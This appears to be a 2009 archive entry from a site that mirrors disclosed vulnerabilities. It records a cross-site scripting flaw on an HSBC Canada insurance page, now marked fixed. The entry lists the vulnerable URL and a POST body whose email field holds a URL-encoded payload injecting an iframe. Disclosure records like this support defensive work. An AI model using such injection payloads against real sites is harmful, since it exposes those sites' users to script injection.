Security researcher Airrox, has submitted on 29/05/2009 a cross-site-scripting (XSS) vulnerability affecting insurance.hsbc.ca, which at the time of submission ranked 23913 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 29/05/2009. It is currently fixed. |
Date submitted: 29/05/2009 |
Date published: 29/05/2009 |
Date fixed: 24/06/2009 | Status: FIXED |
Author: Airrox |
Domain: insurance.hsbc.ca |
Category: XSS |
Pagerank: 23913 |
URL: https://insurance.hsbc.ca/app/simplestart.cfm?CFID=2825408&CFToken=89978537d5d95f81-8E34EF24-F02A-E3 19-0AD7BB2013D42FFE |
POST: gender=&Ft=0&Inch=0&weight=lbs.&State=&Insured_DOB_Day=&Insured_DOB_Month=&Insured_DOB_Year=&Insured _EMail=%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fwww.xssed.com&submitted=&x=232&y=35 |
Click here to view the mirror
|
|
|